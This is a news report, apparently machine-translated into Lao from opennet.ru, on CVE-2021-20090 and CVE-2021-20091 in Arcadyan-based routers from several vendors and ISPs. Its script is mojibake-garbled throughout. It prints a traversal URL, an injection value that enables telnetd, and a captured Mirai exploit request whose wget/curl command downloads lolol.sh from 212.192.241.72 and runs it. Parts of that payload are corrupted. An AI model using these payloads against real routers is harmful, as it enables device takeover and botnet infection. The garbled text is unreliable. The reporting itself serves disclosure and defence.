เบเบฒเบเปเบเบกเบเบตเบเบฑเปเบเปเบซเบเปเปเบเปเบเบทเบเบเบฑเบเบเบถเบเปเบงเปเปเบเปเบเบทเบญเบเปเบฒเบเบเปเปเบเบฑเบ routers เปเบเบเปเบฒเบเบเบตเปเปเบเบตเบกเปเบงเปเบเป HTTP server เบเบฒเบเบเปเบฅเบดเบชเบฑเบ Arcadyan. เปเบเบทเปเบญเปเบซเปเปเบเปเบฎเบฑเบเบเบฒเบเบเบงเบเบเบธเบกเบญเบธเบเบฐเบเบญเบ, เบเบฒเบเบเบฐเบชเบปเบกเบเบฐเบชเบฒเบเบเบญเบเบชเบญเบเบเปเบญเบเปเบซเบงเปเปเบกเปเบเบเบทเบเบเปเบฒเปเบเปเบเบตเปเบญเบฐเบเบธเบเบฒเบเปเบซเปเบเบฐเบเบดเบเบฑเบเปเบฅเบเบฐเปเบเบเบญเบเบฅเบฐเบซเบฑเบ arbitrary เบเบฑเบเบชเบดเบเบเบดเบเบญเบเบฎเบฒเบ. เบเบฑเบเบซเบฒเบเบฑเปเบเบเปเบฒเบงเบชเบปเปเบเบเบปเบเบเบฐเบเบปเบเบเปเป routers ADSL เบเบตเปเบเปเบญเบเบเปเบฒเบเบเบงเปเบฒเบเบเบฒเบ Arcadyan, ASUS เปเบฅเบฐ Buffalo, เปเบเบฑเปเบเบเบฝเบงเบเบฑเบเบเบฑเบเบญเบธเบเบฐเบเบญเบเบเบตเปเบชเบฐเบซเบเบญเบเบเบฒเบเปเบเปเบเบตเปเบซเปเป Beeline (เบเบฑเบเบซเบฒเปเบเปเบเบทเบเบขเบทเบเบขเบฑเบเปเบ Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone เปเบฅเบฐ. เบเบนเปเบเบฐเบเบญเบเบเบฒเบเปเบเบฅเบฐเบเบปเบกเบญเบทเปเบเป. เบกเบฑเบเปเบเปเบเบทเบเบชเบฑเบเปเบเบเปเบซเบฑเบเบงเปเบฒเบเบฑเบเบซเบฒเบเบฑเปเบเบเปเบฒเบงเบกเบตเบขเบนเปเปเบเปเบเบตเบกเปเบง Arcadyan เบชเปเบฒเบฅเบฑเบเบซเบผเบฒเบเบเบงเปเบฒ 10 เบเบตเปเบฅเบฐเปเบเบฅเบฐเบซเบงเปเบฒเบเปเบงเบฅเบฒเบเบตเปเปเบเปเบเบทเบเบเบธเปเบกเบเบญเบเปเบเบทเปเบญเบเปเบฒเบเบญเบญเบเปเบเบขเปเบฒเบเบซเบเปเบญเบ 20 เปเบเบเบญเบธเบเบฐเบเบญเบเบเบฒเบ 17 เบเบนเปเบเบฐเบฅเบดเบเบเบตเปเปเบเบเบเปเบฒเบเบเบฑเบ.
เบเปเบญเบเปเบซเบงเปเบเบณเบญเบดเบ, CVE-2021-20090, เปเบฎเบฑเบเปเบซเปเบกเบฑเบเปเบเบฑเบเปเบเปเบเปเปเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบชเบฐเบเบฃเบดเบเบชเปเบงเบเบเบดเบเบเปเปเปเบงเบฑเบเปเบเป เปเบเบเบเปเปเบกเบตเบเบฒเบเบเบงเบเบชเบญเบเบเบงเบฒเบกเบเบทเบเบเปเบญเบ. เปเบเบเปเบเบทเปเบญเปเบเปเปเบฅเปเบงเบเบญเบเบเปเบญเบเปเบซเบงเปเปเบกเปเบเบงเปเบฒเปเบเบเบฒเบเปเบเปเบเบญเบเปเบงเบฑเบเปเบเบเป, เบเบฒเบเปเบเปเบฅเบเบฐเบเปเบฅเบตเบเบตเปเบเปเบฒเบเบฎเบนเบเบเบฒเบ, เปเบเบฅเป CSS เปเบฅเบฐ scripts JavaScript เบเบทเบเบชเบปเปเบเปเบกเปเบเบชเบฒเบกเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเปเปเบเบเบเปเปเบกเบตเบเบฒเบเบเบงเบเบชเบญเบเบเบงเบฒเบกเบเบทเบเบเปเบญเบ. เปเบเบเปเบฅเบฐเบเบตเบเบตเป, เปเบเปเบฅเบเบฐเบเปเบฅเบตเบเบตเปเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเบเบเปเปเบกเบตเบเบฒเบเบเบดเบชเบนเบเบขเบทเบเบขเบฑเบเปเบกเปเบเบเบทเบเบเบงเบเบชเบญเบเปเบเบเปเบเปเบซเบเปเบฒเบเบฒเบเปเบเบทเปเบญเบเบเบปเปเบ. เบเบฒเบเบฅเบฐเบเบธ โ../โ เบเบปเบงเบญเบฑเบเบชเบญเบเปเบเปเบชเบฑเปเบเบเบฒเบเบเบตเปเบเบฐเปเบเบซเบฒเปเบเปเบฃเบฑเบเบเปเบฃเบตเปเบกเปเปเบกเปเบเบเบทเบเบเบฅเบฑเบญเบเปเบเบเปเบเบตเบกเปเบง, เปเบเปเบเบฒเบเปเบเปเบเบฒเบเบเบฐเบชเบปเบกเบเบฐเบชเบฒเบ โ..%2fโ เบเบทเบเบเปเบฒเบกเปเบ. เบเบฑเปเบเบเบฑเปเบ, เบกเบฑเบเปเบเบฑเบเปเบเปเบเปเบเบตเปเบเบฐเปเบเบตเบเบซเบเปเบฒเบเบตเปเบเปเบญเบเบเบฑเบเปเบเปเบงเบฅเบฒเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเปเบเบฑเปเบ "http://192.168.1.1/images/..%2findex.htm".
เบเปเบญเบเปเบซเบงเปเบเบตเบชเบญเบ, CVE-2021-20091, เบญเบฐเบเบธเบเบฒเบเปเบซเปเบเบนเปเปเบเปเบเบตเปเบกเบตเบเบฒเบเบเบงเบเบชเบญเบเบเบงเบฒเบกเบเบทเบเบเปเบญเบเบชเบฒเบกเบฒเบเบเปเบฝเบเปเบเบเบเบฒเบเบเบฑเปเบเบเปเบฒเบฅเบฐเบเบปเบเบเบญเบเบญเบธเบเบฐเบเบญเบเปเบเบเบเบฒเบเบชเบปเปเบเบเบฒเบฅเบฒเบกเบดเปเบเบตเบเบตเปเบกเบตเบฎเบนเบเปเบเบเบเบดเปเบชเบเปเบเบซเบฒเบชเบฐเบเบดเบ apply_abstract.cgi, เปเบเบดเปเบเบเปเปเปเบเปเบเบงเบเปเบเบดเปเบเบงเปเบฒเบกเบตเบเบปเบงเบญเบฑเบเบชเบญเบเปเบเบงเปเปเปเบขเบนเปเปเบเบเบฒเบฅเบฒเบกเบดเปเบเบต. . เบเบปเบงเบขเปเบฒเบ, เปเบกเบทเปเบญเบเบฐเบเบดเบเบฑเบเบเบฒเบ ping, เบเบนเปเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบฅเบฐเบเบธเบเปเบฒ โ192.168.1.2%0AARC_SYS_TelnetdEnable=1โ เปเบเบเปเบญเบเบเปเปเบกเบนเบเบเบตเปเบกเบตเบเบตเปเบขเบนเป IP เบเบทเบเบเบงเบเบชเบญเบ, เปเบฅเบฐเบชเบฐเบเบฃเบดเบ, เปเบกเบทเปเบญเบชเปเบฒเบเปเบเบฅเปเบเบฒเบเบเบฑเปเบเบเปเบฒ /tmp/etc/config/ .glbcfg, เบเบฐเบเบฝเบเปเบเบง โAARC_SYS_TelnetdEnable=1โ เปเบชเปเปเบเบกเบฑเบโ, เปเบเบดเปเบเปเบเบตเบเปเบเปเปเบเบตเบเปเบงเบต telnetd, เปเบเบดเปเบเบชเบฐเปเบญเบเบเบฒเบเปเบเบปเปเบฒเปเบเป shell เบเบณเบชเบฑเปเบเบเบตเปเบเปเปเบเบณเบเบฑเบเบเปเบงเบเบชเบดเบเบฎเบฒเบ. เปเบเบฑเปเบเบเบฝเบงเบเบฑเบ, เปเบเบเบเบฒเบเบเบฑเปเบเบเปเบฒเบเบฒเบฅเบฒเบกเบดเปเบเบต AARC_SYS, เบเปเบฒเบเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเบฅเบฐเบซเบฑเบเปเบเปเปเบเบฅเบฐเบเบปเบ. เบเปเบญเบเปเบซเบงเปเบเปเบฒเบญเบดเบเปเบฎเบฑเบเปเบซเปเบกเบฑเบเปเบเบฑเบเปเบเปเบเปเบเบตเปเบเบฐเปเบฅเปเบเบชเบฐเบเบฃเบดเบเบเบตเปเบกเบตเบเบฑเบเบซเบฒเปเบเบเบเปเปเบกเบตเบเบฒเบเบเบดเบชเบนเบเบขเบทเบเบขเบฑเบเปเบเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบกเบฑเบเปเบเบฑเบ โ/images/..%2fapply_abstract.cgiโ.
เปเบเบทเปเบญเบเบนเบเบฎเบตเบเบเปเบญเบเปเบซเบงเป, เบเบนเปเปเบเบกเบเบตเบเบฐเบเปเบญเบเบชเบฒเบกเบฒเบเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเปเบเบเบฑเบเบเบญเบเปเบเบทเบญเบเปเบฒเบเบเบตเปเบญเบดเบเปเบเบตเปเบเบเปเบงเบฑเบเบเบณเบฅเบฑเบเปเบฅเปเบเบขเบนเป. เบเบฒเบเบเบฑเบเบชเบดเบเปเบเบเบเบฐเปเบเบเบฒเบเบเปเบฒเบเบเบฒเบเปเบเปเบเบฐเบเบฒเบเบเบญเบเบเบฒเบเปเบเบกเบเบต, เบเบนเปเบเบฐเบเบญเบเบเบฒเบเบเปเบฒเบเบงเบเบซเบผเบฒเบเบญเบญเบเบเบฒเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบญเบธเบเบฐเบเบญเบเบเบญเบเปเบเบปเบฒเปเบเบปเปเบฒเบเบฒเบเปเบเบทเบญเบเปเบฒเบเบเบฒเบเบเบญเบเปเบเบทเปเบญเบเปเบฒเบเบเบฒเบเบงเบดเบเบดเบเปเบชเบเบฑเบเบซเบฒเปเบเบเบเบฒเบเบเปเบฅเบดเบเบฒเบเบชเบฐเบซเบเบฑเบเบชเบฐเบซเบเบนเบ. เบเปเบฒเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบญเบดเบเปเบเบตเปเบเบเบเบทเบเบเปเบฒเบเบฑเบเบเบฝเบเปเบเปเปเบเปเบเบทเบญเบเปเบฒเบเบเบฒเบเปเบ, เบเบฒเบเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบเบทเบเบเบฐเบเบดเบเบฑเบเบเบฒเบเปเบเบทเบญเบเปเบฒเบเบเบฒเบเบเบญเบเปเบเบเปเบเปเปเบเบฑเบเบเบดเบ "เบเบฒเบเบเบนเบเบกเบฑเบ DNS". เบเปเบญเบเปเบซเบงเปเปเบเปเบเบทเบเบเบณเปเบเปเบขเปเบฒเบเบเบดเบเบเบฑเบเปเบเบทเปเบญเปเบเบทเปเบญเบกเบเปเป routers เบเบฑเบ Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 เบเบฒเบเปเบเบทเปเบญเบกเบเปเป: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh ; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru